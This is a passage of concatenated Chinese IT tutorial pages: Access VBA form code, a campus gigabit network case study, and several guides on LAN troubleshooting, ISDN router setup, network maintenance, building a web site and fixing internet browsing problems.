    ①在“设计视图”工具箱中，选“组合框”控件使用“组合框向导”创建“组合框0”，“选定字段”为ml。其它“属性”为默认设置。

    ②在“设计视图”工具箱中，选“组合框”控件使用“组合框向导”创建“组合框１”，“选定字段”为tm。

    ③在“设计视图”工具箱中，选“命令按钮”控件，使用“命令按钮向导”创建“浏览”按钮。“标题”为：浏览。

    * 使用“命令按钮向导”创建“查找文件”按钮，“标题”为：查找文件。在该按钮“单击”“事件过程”中输入代码：

    Private Sub 命令17_Click()

    Set fs = Application.FileSearch

    With fs

    .LookIn = "e:\sfong" '用户自定义路径

    .FileName = "sf*.*" '用户自定义文件类型

    If .Execute(SortBy:=msoSortByFileName, _

    SortOrder:=msoSortOrderAscending) > 0 Then

    For i = 1 To .FoundFiles.Count

    MsgBox .FoundFiles(i)

    组合0 = .FoundFiles(i)

    Me.bt = .FoundFiles(i)

    DoCmd.GoToRecord , , acNext

    Next i

    Else

    MsgBox "There were no files found."

    End If

    End With

    End Sub

    * 使用“命令按钮向导”创建“数据发布”按钮，“标题”为：数据发布。在该按钮“单击”“事件过程”中输入代码：

    Private Sub 命令27_Click()

    Dim intOutputTO As Integer

    Dim strName As String

    Dim strPath As String

    Dim strRecipName As String

    Dim strOutputFormat As String

    DoCmd.Hourglass True

    strOutputFormat = "Snapshot Format"

    strPath = "e:\inetpub\wwwroot\xlgs\xls\table3.snp"

    strName = "table4"

    DoCmd.OutputTo acOutputReport, _

    strName, strOutputFormat, strPath

    DoCmd.Hourglass False

    End Sub

    * 分别在wb、tm、bg“文本框”“属性”，“双击事件”“事件过程”代码窗口中输入代码：

    Private Sub wb_DblClick(Cancel As Integer)

    DoCmd.RunCommand acCmdPaste

    End Sub

    * 在“table1:窗体”设计视图中，将各对象控件调整到合适位置。

    ５． 报表的设计

    为了在数据访问页（DAP）发布SQLServer Activex控件数据，要使用报表快照控件。因此，要建一个报表，以便形成报表快照文件使用。创建过程（略）。

    ６． 数据访问页的设计

    由于数据浏览和操作上技术实现的要求，我们把文本数据访问页和Sql ActiveX数据访问页分别设计。设计文本数据访问页遵循如下步骤：

    * 在“adp1：数据库”窗口上，选数据访问页“使用向导创建数据访问页”。在“数据访问页向导”对话框中设定：“表/视图”为：视图1；“选定的字段”为：ＸＨ，ＷＢ，“请为数据页指定标题”为：文本数据浏览。选定“修改数据页的设计”，单击“完成”。

    * 在“page1:数据访问页”“设计视图”中，选定“对象：ＸＨ”，单击右键在快捷选单中选“升级”，以建立分组浏览。

    * 在“页眉：Table1-xh”空间中添加一个“下拉列表”控件，在“组合框向导”对话框中选“用组合框来查询表或视图中的数值”，“选定字段”为：tm。在该组合框“属性”中“ListRowSourse”设为记录集：dbo_视图1；“ListDisplayfield”设为：tm1:tm；“ListBoundField”设为：tm2:tm。

    * 在选单“视图”中选“排序与分组”条。在“排序与分组”对话框中，“分组筛选控件”设为：下拉列表０；“分组筛选字段”设为：组tm 。

    * 在“页眉：Table1-xh”空间中添加一个“滚动文字”控件，在其“属性”“controlsource”中设为：组tm1:tm。

    * 选中“对象：xh”，在其“属性”中“display”设为：none，删去“对象：Table1-xh展开”控件，调整“页眉：Table1”中的“对象：wb”页，使其占满一页。设计ActiveX数据访问页（我们称为表格数据访问页）应遵循以下步骤：

    * 在“adp1:数据库”窗口“对象：页”页面中，使用“在设计视图中创建数据访问页”。在该“设计视图”上选“字段列表”工具按钮，“在字段列表”对象框中展开表：Table1，将字段xh拖至“页眉：Table1”空间中。

    * 添加“下拉列表０”控件，在“组合框向导”对话框中选“用组合框来查找表或视图中的数值”，“选定”字段为：tm 。在该组合框“属性”中“ListRowSourse”设为记录集：dbo_视图2；“ListDisplayfield”设为：tm1:tm；“ListBoundField”设为：tm2:tm。

    * 在选单“视图”中选“排序与分组”条。在“排序与分组”对话框中，“分组筛选控件”设为：下拉列表０；“分组筛选字段”设为：组tm 。

    * 添加“滚动文字1”控件，在其“属性”的“contralsource”中设为：tm。

    * 在“page1:数据访问页”设计视图工具箱中选“其它控件”，在控件的下拉列表中选择“snapshot viewer control 9.0”控件，单击选中。在“页眉：Table1”的空间上画出一个合适的方框，插入“snapshot viewer control 9.0”控件。选中该控件，单击右键选择“snapshot viewer控件对象”“属性”，在“属性”对话框中，“快照路径”设为： \\www\ inetpub\ wwwroot\ xlgs\ xls\ table3.snp。在该控件“属性”中，“id”设为：snapshotviewer1；“childlabel”设为：snapshotviewer1，单击“确定”。

    * 在页“page1:数据访问页”设计视图工具箱中选定“命令按钮”控件，添加“浏览”命令按钮。在该命令按钮“属性”的“id”设为：浏览。选中该命令按钮单击右键，选择“Microsoft 脚本编辑器”。在脚本编辑器窗口的“脚本大纲”中展开“浏览”对象，在“onclick”事件代码相应位置输入如下代码：

〈SCRIPT event=onclick for=命令1 language=vbscript〉

〈/SCRIP〉

返回


千兆校园网全面解决方案

《一键清理系统垃圾》

千兆校园网全面解决方案

    校园计算机网络已成为学校办学的基础设施和必备条件。中国华育发展总公司是国家教育部直属的、以开发教育软件和网络集成为主、推进教育教学信息化和现代化为主要经营方向的综合型企业。
    中国华育通过广泛的市场调研,针对中等学校办学特点和应用需求，潜心研究，开发出“千兆校园网整体解决方案”。该方案以千兆主干网络为基础平台，以校园网应用为主线，以实现广泛的教育资源共享、提高教育教学的现代化水平为目的，为建设信息化学校提供了一个完整的解决方案。

    针对不同类型的学校，中国华育开发出了中国职业教育校园网集成系统CVES、中国基础教育校园网集成系统CFES。整个学校的办公自动化、教育管理、图书馆管理、多媒体教学及远程教育可以一网解决。

    做为一个典型的案例，北京交通管理干部学院千兆校园网的建设，可以充分展示华育的校园网解决方案是如何帮助学校运用现代教育技术、进行现代化的教学和教育管理的。

    北京交通管理干部学院千兆校园网全面解决方案，由中国华育发展总公司信息工程事业部负责设计与实施，于1999年8月开始，1999年10月完成。这是一个整体规划、分步实施、充分考虑现有设备与实际资金情况的方案。第一步，先建立网络中心和主干网，然后建立学校的信息管理网络、教学网络、图书管理网络和电子阅览室各应用子系统，并进行办公楼、电教楼和图书馆的结构化布线，将网络扩展到整个校园；第二步，在所有的教室安放计算机和电视机，进行多媒体教学，实现校园网的全部功能；第三步，通过路由器与CERNET和Internet接入。该方案充分考虑到学校的应用和资金情况，具有较高的科学性和参考价值。

    ■ 校园网建设核心

    校园网建设应该以应用为核心，在设计中充分考虑到教育管理和多媒体教学的要求，并且网络技术上应该具有一定的先进性，同时还要为以后的扩展留有一定的空间。为此校园网应该能达到以下要求：

    * 网络具有传递语音、图形、图像等多种信息媒体功能，具备性能优越的资源共享功能；

    * 校园网中各终端间具有快速交换功能；

    * 中心系统交换机采用虚拟网技术，对网络用户具有分类控制功能。

    * 对网络资源的访问提供完善的权限控制；

    * 网络具有防止及便于捕杀病毒功能，以保证网络使用安全；

    * 校园网与Internet网相连后具有“防火墙”过滤功能，以防止网络黑客入侵网络系统;

    * 可对接入因特网的各网络用户进行权限控制。

    ■ 校园网硬件设计

    ● 校园网主干网络

    在北京交通管理干部学院千兆校园网方案中，采用基于第三层交换的千兆以太网作为校园网主干。

    在本方案中，主干交换机采用LUCENT公司CAJUN P550交换机，它属于第三层千兆以太网路由交换机，内部集成路由功能，具备高容量、无阻塞、优质的管理能力和可靠的多媒体支持等特点。将千兆以太网交换、快速以太网交换、以太网交换以及路由都集成到一个交换机中，使得交换机的功能十分强大。

    节点交换机和主干交换机之间通过千兆光纤连接。

    电教楼和图书楼采用Cajun P120交换机作节点交换机，组成快速以太工作组网。

     ● 网络服务器

    网络服务器包括文件服务器、Internet服务器、网管工作站，以及面向全校使用的小型机等。

    服务器根据学校的要求选择了HP LH4服务器。

    ● 干线光纤

    在校园网中，此次需敷设二条主干光缆，采用的是多芯室内铠装多模光缆，分别敷设在办公楼到电教楼和办公楼到图书楼。

     ● 结构化综合布线：

    本方案中，我们采用Lucent Technologies 的SYSTIMAX SCS综合布线产品。

    依据结构化布线原则，本着达到布局美观的效果，楼宇间的布线采用光纤，各楼层的布线走PVC管或在天花板内走线，并在结构化布线系统中的信息插座留有一定的冗余度，以确保日后终端设备位置调整和网络扩展的需要。

    ● 广域网互联和网络安全

    广域互联也是本设计的重点，本方案中使用PortMaster2R通过一条DDN专线，将校园网接入中国教育科研网CERNET， 从而进入国际互联网Internet。

    为保证网络安全，防止黑客非法侵入网络，网络必须提供IP防火墙，PortMaster2R是内置防火墙，可有效地保证网络的安全。

    ● 应用子网及网络互连

    北京交通管理干部学院校园网除网络主干外，还拥有教育管理子网、图书馆管理子网、电子阅览室子网、计算中心子网等。

    对于已有的子网只需要通过节点交换机的10M/100M以太网接口与该子网的集线器或交换机相连即可。

    ● 网络管理及系统软件

    本方案全部采用智能网络设备，并通过网络管理协议传送给管理设备。本方案采用Lucent基于Windows NT平台的Cajun View软件，通过网络管理工作站,对整个网络的智能设备进行有效的图形管理。

    本方案使用的系统软件如下：

    网络平台：Windows NT Server 4.0中文版，工作站端用Pwin98；

    数据库开发平台：Microsoft SQL Server 7.0；

    邮件通讯软件：Microsoft Exchange Server 5.5；

    应用软件包括：

    多媒体视频广播软件：HYcast

    多媒体教学及课件制作软件：HYmedia

    多媒体视频点播软件：HYVOD

    ■ 校园网应用

    ● 校园网管理信息系统

    中国职业教育网络集成系统(China Vocational Education Campus Network Integrated System)简称中职校园网系统(China Vocational Education System)，CVES是其英文的缩写。

    CVES是根据国家教委职教司颁布的《国家教育管理信息系统总体规划纲要》的精神，在STSIS(基于校园网和校园卡的中专学校信息系统)基础上发展起来的面向二十一世纪的中国职业教育校园网集成系统。

    CVES集管理、教学和科研为一体，是中等专业学校信息化的全面解决方案。通过IC卡的运用，实现了学生证、出入证、阅览证、借书证、就餐卡、上机卡、储蓄卡等的功能，在校园管理方面，形成一道亮丽的风景线。

    CVES软件的运行网络平台是Windows NT4.0，客户端的平台是Win95或Win98，数据库系统则采用了SQL Server 7.0

    CVES教育管理软件主要包括：

    教学管理部分：教务管理、师资管理、教材管理、设备管理

    学生管理部分：学籍管理、考绩管理、招生管理、分配管理

    行政管理部分：校情管理、校情查询、综合查询、人事管理、光盘后备与查询

    通用服务部分：通用查询与报表系统、系统管理

    ● 校园网计算机教学系统

    计算机教学系统主要包括多媒体网络教室、多媒体视频点播、多媒体视频广播系统。针对北京交通管理干部学院具体情况，华育为学校设计了一个能够充分实现学校先进教育思想的现代化的教学平台。该方案实现了多媒体网络教学功能，它采用华育自有的多媒体教学软件，即华育多媒体视频点播系统和多媒体视频广播系统，并充分利用校园网高带宽的优势，在计算机数据网络中实现了校园闭路电视的全部功能，可以对观摩教室进行现场直播，为现代化教学提供了一个新的平台。

    ● 校园网站

    校园网不是一个独立的、封闭的体系，校园网与Internet互连后，校园网用户在权限允许的范围内可以使用Internet上的Web访问、Email收发、FTP、Telnet、BBS、新闻组、讨论组、个人主页等服务。

    校园网站连接Internet，用于宣传学校形象、教学信息发布、提供信息查询等，以后可成为网上教学的渠道。网站主页的设计，主要由老师创意，学生制作，体现学生的创造性，培养学生的动手能力。

    ■ 方案特点

    综合网络技术的发展，并对学校的需求进行了详细的分析后可看出，北京交通管理干部学院的校园网方案具有先进性、可扩展性、开放性、安全性、可管理性和丰富的应用等特点，是中国华育发展总公司开展教育信息工程的成功案例。

    北京交通管理干部学院校园计算机网络设计方案

返回


全面解决家庭局域网故障

《一键清理系统垃圾》

全面解决家庭局域网故障

..

    搭建家庭局域网不难，想要一次调通可不是那么容易。不过，难者不会，会者不难，掌握了下面这些小技巧，你就可以轻松解决网络软硬故障了。

    硬件故障

    硬件故障主要有网卡自身故障、网卡未正确安装、网卡故障、集线器故障等。

    首先检查插上计算机I/O插槽上的网卡侧面的指示灯是否正常，网卡一般有两个指示灯“连接指示灯”和“信号传输指示灯”，正常情况下“连接指示灯”应一直亮着，而“信号传输指示灯”在信号传输时应不停闪烁。如“连接指示灯”不亮，应考虑连接故障，即网卡自身是否正常，安装是否正确，网线、集线器是否有故障。

    我们先大致从网卡外表观察一下：

    1.RJ45接头的问题

    RJ45接头容易出故障，例如，双绞线的头没顶到RJ45接头顶端，绞线未按照标准脚位压入接头，甚至接头规格不符或者是内部的绞线断了。

    镀金层厚度对接头品质的影响也是相当可观的，例如镀得太薄，那么网线经过三五次插拔之后，也许就把它磨掉了，接着被氧化，当然也容易发生断线。

    2.接线故障或接触不良

    一般可观察下列几个地方：双绞线颜色和RJ-45接头的脚位是否相符；线头是否顶到RJ-45接头顶端，若没有，该线的接触会较差.需再重新压按一次；观察RJ-45侧面。金属片是否已刺入绞线之中？若没有，极可能造成线路不通；观察双绞线外皮去掉的地方，是否使用剥线工具时切断了绞线(绞线内铜导线已断，但皮未断)。

    如果还不能发现问题，那么我们可用替换法排除网线和集线器故障，即用通信正常的电脑的网线来连接故障机，如能正常通信，显然是网线或集线器的故障，再转换集线器端口来区分到底是网线还是集线器的故障，许多时候集线器的指示灯也能提示是否是集线器故障，正常对应端口的灯应亮着。

    软件故障

    如果网卡的信号传输指示灯不亮，这一般是由网络的软件故障引起的。

    1.检查网卡设置

    普通网卡的驱动程序磁盘大多附有测试和设置网卡参数的程序。分别查验网卡设置的接头类型、IRQ、I/O端口地址等参数，若有冲突.只要重新设置(有些必须调整跳线)，一般都能使网络恢复正常。

    另外检查一下网卡驱动程序是否正常安装。不同网卡使用的驱动程序亦不尽相同，假如你选错了，就有可能发生不兼容的现象。修复的方法亦不难，只要找到正确的驱动程序.重新安装即可。

    最后我们简单检验一下网卡设置故障是否排除。打开“控制面板-系统-设备管理器”，选中我们安装的网络适配器，点击“属性”按钮，在“常规”文件夹中，可以查看网卡是否在正常工作。

    2.检查网络协议

    打开“控制面板-网络-配置”选项，查看已安装的网络协议，必须配置以下各项：NetBEUI协议和TCP/IP协议，Microsoft友好登录，拨号网络适配器。如果以上各项都存在，重点检查TCP/IP是否设置正确。在TCP/IP属性中要确保每一台电脑都有唯一的IP地址，将子网掩码统一设置为255.255.255.0，网关要设为代理服务器的IP地址(如192.168.0.1)。另外必须注意主机名在局域网内也应该是唯一的。最后，我们用ping命令来检验一下网卡能否正常工作。

    1.ping 127.0.0.1

    127.0.0.1是本地循环地址.如果该地址无法ping通，则表明本机TCP/IP协议不能正常工作；如果ping通了该地址，证明TCP/IP协议正常，则进入下一个步骤继续诊断。

    2.ping本机的IP地址

    使用ipconfig命令可以查看本机的IP地址，ping该IP地址，如果ping通，表明网络适配器(网卡或者Modem)工作正常，则需要进入下一个步骤继续检查；反之则是网络适配器出现故障。

    3.ping本地网关

    本地网关的IP地址是已知的IP地址。ping本地网关的IP地址，ping不通则表明网络线路出现故障。如果网络中还包含有路由器，还可以ping路由器在本网段端口的IP地址，不通则此段线路有问题，通则再ping路由器在目标计算机所在同段的端口IP地址.不通则是路由出现故障。如果通，最后再ping目的机的IP地址。

    4.ping网址

    如果要检测的是一个带DNS服务的网络(比如Internet)，上一步ping通了目标计算机的IP地址后。仍然无法连接到该机，则可以ping该机的网络名，比如：ping www.sohu.com.cn，正常情况下会出现该网址所指向的IP地址，这表明本机的DNS设置正确而且DNS服务器工作正常，反之就可能是其中之一出现了故障。

    常用DOS命令

    1.ping命令

    ping命令是用于确定本地主机是否能与另一台主机成功交换数据包。根据返回的信息，可以推断TCP/IP参数(因为现在网络一般都是通过TCP/IP协议来传送数据的)是否设置正确，以及运行是否正常、网络是否通畅等。但ping成功并不代表TCP/IP配置一定正确，你有可能要执行大量的本地主机与远程主机的数据包交换，才能确信TCP/IP配置无误。

    ping命令可以在MS-DOS窗口下运行，执行格式如下：

    ping网址

    例如：ping 127.0.0.1

    2.ipconfig命令

    ipconfig这个命令，通常只被用户用来查询本地的IP地址、子网掩码、默认网关等信息。ipconfig、ping是我们在诊断网络故障或查询网络数据时常用的命令，它们的使用也很简单，即使你不知道它们的应用格式，也可以通过“ipconfig/?”或“ping/?”这种标准的DOS命令帮助方式来获取相关信息。

    3.tracert命令

    tracert命令能够追踪你访问网络中某个节点时所走的路径.也可以用来分析网络和排查网络故障。举个例，我想知道自己访问sohu.com.cn时走的是怎样一条路线，就可以在DOS状态下输入tracert sohu.com.cn，执行后经过一段时间等待，系统会反馈出很多IP地址。最上方的IP地址是本地的网关，而最后面一个地址就是sohu.com.cn网站的IP地址了。换句话说，从上至下，便是我们访问sohu.com.cn所走过的“足迹”。

    4.netstat命令

    netstat命令是一个监控TCP/IP网络的实用的工具，它可以显示实际的网络连接以及每一个网络接口设备的状态信息。Netstat命令的参数不是很多，我们常用Netstat -r来监视网络的连接状态，非常管用。

    在网络出现故障时，我们经常交替使用上面这四个命令，以方便查找故障。


让局域网快速连接Internet

《一键清理系统垃圾》

让局域网快速连接Internet

Internet是连接全球数百万台计算机的国际互连网络。近几年，Internet在我国发展非常迅速，上网人数日益增多，Internet在使用户获取大量信息的同时，也提供了无数的就业机会。如何培养学生使用Internet是职业技术院校面临的问题。目前很多学校的计算机实验室已经安装了局域网，如果在现有基础上增加一些设备，使局域网工作站能连接上Internet，将给教学带来很好的效果。

Modem共享太慢

不少报纸和杂志刊登过如何共享一个Modem使局域网的工作站利用一个账号一根电话线实现网上冲浪的文章，本人利用管理计算机实验室机会曾经做这方面的尝试，包括使用从早期的WINGATE到最近流行的SYSGATE。利用WINGATE，工作站的设置比较麻烦，SYSGATE的设置就相对简单多了，两者都能实现工作站共享一个Modem访问Internet。但在实际使用过程中，尤其是学生集中上机的过程中，速度慢是一个很重要的问题，相信使用过的同仁都有这个感受。通过DDN线路，使用路由器接入Internet，费用较高，对小型网络用户像一般学校和单位未必能承受。

ISDN路由解决方案

而近来在全国几大城市开通的ISDN一线通，为用户提供了另一种高速访问Internet的方式。ISDN称为综合业务数字网（Integrate Service Digital Network），又称“一线通”。即在一条线上实现包括语音、文字、数据、图像在内的综合业务。它分为窄带（N－ISDN）与宽带（B－ISDN）两种。窄带综合业务数字网主要向用户提供的有2B＋D（BΚ64kb／s，DΚ16kb／s）和30B＋D（2Mb／s）两种，目前窄带综合业务数字网技术已经很成熟，进入了商用化和家用化的阶段。ISDN对于提高通信网的效率，满足社会对通信业务日益增长的需求具有十分重要的意义。因此，ISDN越来越受到人们的关注。它能使网络用户以拨号方式，通过ISDN将局域网接入互联网。最近笔者成功利用ISDN作路由将实验室30多台计算机接入Internet，发现无论是在上网速度，还是在下载文件方面有了很大的提高，下载文件几乎很少掉线，这种方式是小型网络用户目前最佳的选择。

下面我就详细介绍一下安装调试过程，整个过程分两步：硬件连接和软件安装。

第一步：硬件的连接

图1是硬件连接示意图

在局域网已经正常工作的情况下，用户需要购买NT1、TA、ISDN路由器。我使用NT1是深圳华为产品，TA是台湾ACER产品，ISDN路由器是台湾MICRONET产品。

NT1“一线通”即用户使用的网络终端。NT1相当于普通电话机的接线盒，可以连接多个功能相同或不同的终端。利用NT1您可以一边在Internet或视聆通网上冲浪，一边打电话或进行其他数据通信。

TA就是终端适配器，具有接口变换功能，能将非标准ISDN终端（如PC卡、模拟话机）适配为标准的ISDN终端。

第二步：软件的调试安装

包括TA、ISDN路由器和工作站，其中最重要的是ISDN路由器的设置，工作站的设置相对较简单。下面依次介绍：

TA的安装

和普通的调制解调一样，在按图1连接之前任选一台工作站，利用附带的信号线把工作站和TA相连，启动工作站，在［控制面板］的［调制解调器］安装TA的驱动程序即可。

ISDN路由器的设置

假设您的局域网已经能正常使用，在连接好硬件设备以后，打开局域网的任意一台工作站电脑，运行IE4．0浏览器，在浏览器的URL地址端输入：http：／／192．168．0．1，然后输入密码（产品说明书的第一页），这时出现图2画面。在图2的左边可以看到有Ports、Advanced、Status、E－mail、Help四项。选

择［Ports］项，输入上网的用户名及密码，连接Internet的电话号码为163，IP地址不输入，域名服务器输入您所接入ISP服务器地址，例如202．96．128．68。在ISDN特性选项，有许多种类ISDN，类型选为OTHERS。

选择［Advanced］项，deviceIP地址设为192．168．0．1，Router不填；networkmask设为255．255．255．0，如果需要改变密码，可以输入新的密码；在DHCPSERVER项中，路由器分配的起始IP地址为192．168．0．1，最后的地址为192．168．0．50（允许最大工作站数为50），DNSIP地址最多可设3个，设置完毕，单击OK键选择［STATUS］项，可以查看设备的连接状态。

选择［E－mail］项，可以用来分发电子邮件给各工作站用户，但随着Internet上免费电子信箱的随意申请，这项功能使用的较少。

图2

选择［HELP］项，这里提供了路由器各项设置的帮助。Windows 95／98客户机的设置：

1．启动［控制面板］中的［网络图标］：

·标识计算机名：给出网上计算机的唯一名称；

·增加TCP／IP协议；

·配置TCP／IP属性：

①IP地址：选自动获取IP地址，

②WINS配置：选使用DHCP进行WINS解析，

③网关：无，

④DNS配置：启用DNS。

2．浏览器软件的设置。在工作站上，凡是需访问因特网的软件都设置成通过局域网连接因特网，一定不能选择通过代理服务器访问。

至此所有的连接安装完毕，用户上网之前只需要打开路由器电源开关，路由器进程服务自动拨号连接到Internet，在工作站上的任一台电脑就可以轻松上网，去体验网上冲浪的乐趣。

返回


如何高效维护局域网

《一键清理系统垃圾》

如何高效维护局域网

合理设置服务器的硬盘
    使用局域网办公的用户，经常会使用网络来打印材料和访问文件。由于某种原因，网络访问的速度可能会不正常，这时我们往往会错误地认为导致网速降低的原因可能是网络中的某些设备发生了瓶颈，例如网卡、交换机、集线器等，其实对网速影响最大的还是服务器硬盘的速度。因此正确地配置好局域网中服务器的硬盘，将对整个局域网中的网络性能有很大的改善。通常，我们在设置硬盘时需要考虑以下几个因素：
    服务器中的硬盘应尽量选择转速快，容量大的那种，因为硬盘转速快，通过网络访问服务器上的数据的速度也越快；
    服务器中的硬盘接口最好是SCSI型号的，因为该接口比IDE或EIDE接口传输数据时速度要快，它采用并行传输数据的模式来发送和接受数据的；
    如果条件允许的话，我们可以给网络服务器安装硬盘阵列卡，因为硬盘阵列卡能较大幅度地提升硬盘的读写性能和安全性；
    当然在这里大家还要注意的是，在同一SCSI通道，不要将低速SCSI设备(如CD)与硬盘共用，否则硬盘的SCSI接口高速传输数据的性能将得不到发挥。
    正确使用“桥”式设备
    “桥”式设备通常是用于同一网段的网络设备，而路由器则是用于不同区段的网络设备。笔者所在单位，曾经安装一套微波联网设备，物理设备联通以后，上网调试，服务器上老是提示当前网段号应是对方的网段号。将服务器的网段号与对方改为一致后，服务器的报警消失了。啊！原来这是一套具有桥接性质的设备。后来与另外一个地点安装微波联网设备，换用了其他一家厂商的产品，在连接以前我们就将两边的网段号改为一致，可当装上设备以后，服务器又出现了报警：当前路由错误。修改了一边的网段以后，报警消失了。由此可见，正确区分“路由”设备和“桥式”设备，在设置网络参数方面是很重要的。
    按规则进行连线
    连接局域网中的每台计算机都是用双绞线来实现的，但是并不是用双绞线把两台计算机简单地相互连接起来，就能实现通信目的的，我们必须按照一定的连线规则来进行连线。笔者曾经试图把两台相距100米以外的计算机用双绞线连接起来，从而实现通信，但无论怎么努力都没有连接成功，后来经行家指点，双绞线的连接距离不能超过100米。另外，我们如果需要连接超过100米的两台计算机时，必须使用转换设备，在连接转换设备和交换机时，我们还必须进行跳线。这是因为以太网中，一般是使用两对双绞线，排列在1、2、3、6的位置，如果使用的不是两对线，而是将原配对使用的线分开使用，就会形成串绕，从而产生较大的串扰(NEXT)。对网络性能有较大影响。10M网络环境这种情况不明显，100M的网络环境下如果流量大或者距离长，网络就会无法联通。
    严格执行接地要求
    由于在局域网中，传输的都是一些弱信号，如果操作稍有不当或者没有按照网络设备的具体操作要求来办的话，就可能在连网中出现干扰信息，严重的能导致整个网络不通；特别是一些网络转接设备，由于涉及到远程线路，它对接地的要求非常严格，否则该网络设备将达不到规定的连接速率，从而在联网的过程中产生各种莫名其妙的故障现象。笔者曾经无意将路由器的电源插头插在了市电的插座上，结果128K DDN专线就是无法和因特网联通。电信局来人检查线路都很正常，最后检查路由器电源的零地电压，发现不对，换回到UPS的插座上，一切恢复正常。另外一次，路由器的电源插头接地端坏掉，从而造成数据包经常丢失，做PING连接时，时好时坏，更换电源线后一切正常。由此可见，我们在使用网络设备时，一定要在设备规定的条件下进行，否则将会给我们的工作带来很大的麻烦。
    使用质量好、速度快的新式网卡
    在局域网中，计算机与计算机之间不能通信是很正常的事情，引起的故障原因可能有很多。笔者曾经统计，局域网中出现的故障大部分与网卡有关，或者是网卡没有正确安装好，或者是网络线接触不良，也有可能是网卡比较旧，不能被计算机正确识别，另外也有的网卡安装在服务器中，经受不住大容量数据的冲击，最终报废等。因此，为了避免上述的现象发生，我们一定要舍得投资，如果网卡是安装在服务器中，一定要使用质量好的网卡，因为服务器一般都是不间断运行，只有质量好的网卡才能长时间进行“工作”，另外由于服务器传输数据的容量较大，因此我们购买的网卡容量必须与之匹配，这样才能实现“好马配好鞍”。
    合理设置交换机
    交换机是局域网中的一个重要的数据交换设备，正确合理地使用交换机也能很好地改善网络中的数据传输性能。笔者曾经将交换机端口配置为100M全双工，而服务器上安装了一块型号为Intel100M EISA网卡，安装以后一切正常，但在大流量负荷数据传输时，速度变得极慢，最后发现这款网卡不支持全双工。将交换机端口改为半双工以后，故障消失了。这说明交换机的端口与网卡的速率和双工方式必须一致。目前有许多自适应的网卡和交换机，按照原理，应能正确适应速率和双工方式，但实际上，由于品牌的不一致,往往不能正确实现全双工方式。明明服务器网卡设为全双工，但交换机的双工灯就是不亮，只有手工强制设定才能解决。 因此，我们在设置网络设备参数时，一定要参考服务器或者其他工作站上的网络设备参数，尽量能使个设备匹配工作。


如何建立自己的Web站点

《一键清理系统垃圾》

如何建立自己的Web站点

现在许多ISP为广大网友提供一定的空间让他们自己建立个人主页，但总让人有一种寄人篱下的感觉。一些有财力的个人和公司则想完全建立自己的Web站点。下面简单介绍一下建立自己的Web站点需要完成的一些工作：

1.采用高性能计算机作为Web Server，一般采用具有大内存、大硬盘、高性能I/O的网络服务器。

2.考虑硬盘容量。因为建立Web站点后，别人就会访问，所以自己硬盘应尽量大些，允许建立很多主页。

3.接入Internet。找ISP确定采用何种链路及通信方式。一般采用专线方式(64kbps)和自己的Web站连接。

4.申请域名。到Inernet NIC等相关机构登记。Internet上用域名来管理，它不但提供静态IP地址，而且将IP地址与域名相联系。Internet上由NIC负责域名登记问题。若要将你的域名放入Internet上，必须在NIC中登记，以免混乱。

5.安装相应软件。

(1)首先应建立好TCP/IP网，可以采用Ping等TCP/IP工具调试TCP/IP网，并保证其网络畅通；

(2)在服务器端安装Web Server软件；

(3)在客户端安装Browser软件。如Netscape Navigator或Microsoft的Internet Explorer等。

6.制作Homepage。既可以用Editor、Notepad等工具编写，也可采用Frontpage；后者提供给用户一个HTML模板，用户可以在此模板上增加自己的信息内容，从而使Homepage制作更加简单，风格也更统一。用HTML编写好Homepage后，将其放入Web Server的目录下，并对外公布，其他用户便可访问此Homepage。

7.把Web Site登记到Internet上一些信息搜索引擎中如Yahoo、Infoseek等。这样，使Internet上的广大用户更易于访问自己的站点。

返回


如何排除上网过程中所遇到的种种故障

《一键清理系统垃圾》

如何排除上网过程中所遇到的种种故障

  当上网成为工作、学习或娱乐的需要而普及时，越来越多的上网故障被人们发现。网络先驱者或许认为这些故障都是“小菜”，但还有许多的用户却因为这样或那样的原因导致无法正常上网。在人们越来越离不开网络的今天，如何排除上网过程中所遇到的种种故障呢？

    问：我通过双网卡实现了两台Windows系统的电脑互联，但联网后发现：主机中上网一切正常，客户机中却打不开网页，但又可以上QQ。请问如何来解决这样的问题呢？

    答：造成这样的原因，可能是Windows系统中TCP/IP的MaxMTU值和ADSL中的MaxMTU值不匹配所造成的。你可以通过修改客户机中的MaxMTU值来解决这个问题。打开注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
\Services\Tcpip\Parameters\Interfaces\]；在“Interface”项下查找包含有你机器网络IP设置的主键，然后在该主键中新建一个REG_DWORD类型的“MTU”键，并设置其键值为“1450”或是小于“1492”的任意数值，最后重启客户机即可。

    问：最近通过IE浏览器打开有些网页时，总是弹出一个“该程序执行了非法操作，即将关闭”的提示对话框，单击该对话框中的“确定”按钮后又弹出一个对话框，并提示“发生内部错误……”，再次单击“确定”按钮后，所有打开的IE窗口全部自动关闭。请问这是为什么？有解决的办法吗？

    答：这可能是因为你运行的程序占用内存资源过多，解决方法当然只有关掉当前不用的程序或IE窗口；另外，当IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览的网站本身含有错误代码等情况，都有可能促使问题的发生，您可以通过以下操作让问题得到解决。降低IE安全级别：打开IE浏览器，执行“工具→Internet选项”菜单；选择“安全”标签下的“Internet”项，并单击“默认级别”按钮，拖动滑块降低默认的安全级别即可；另外，将你的IE升级到较高版本，下载地址：www.microsoft.com/windows/ie_intl/cn/default.mspx。

    问：为什么我的IE浏览器在点击超级链接时毫无反应？

    答：出现点击超级链接没反应的原因多半是因为IE新建窗口模块被破坏所致。在“开始→运行”栏中分别运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”，待这两个DLL文件注册后，重启系统；如果还不行，则可将“mshtml.dll、urlmon.dll、 msjava.dll、browseui.dll、oleaut32.dll和shell32.dll”通过同样的方法分别进行注册，最后重启系统。

    问：上次将一个网页以“允许脱机浏览”的方式收藏，但后来再用IE浏览器打开时，却提示“无法浏览”，期间我只修改了一下系统时间，之后我又收藏了一个脱机文件，打开正常。请问为什么会出现这样的情况？

    答：这多半是因为你修改了系统时间，引起IE历史记录的错乱，导致脱机文件无法浏览的结果。遇到这种情况时，可以在“临时文件夹”中以搜索的方式来激活它。单击“开始”菜单中的“搜索”按钮，选择“所有文件和文件夹”搜索方式，在关键字栏中输入网页中的部分关键字，并在搜索范围定位到IE临时文件夹的地址，如“C:\Windows\Temporary Internet Files”，单击“搜索”按钮，在结果列表里双击目标页即可。

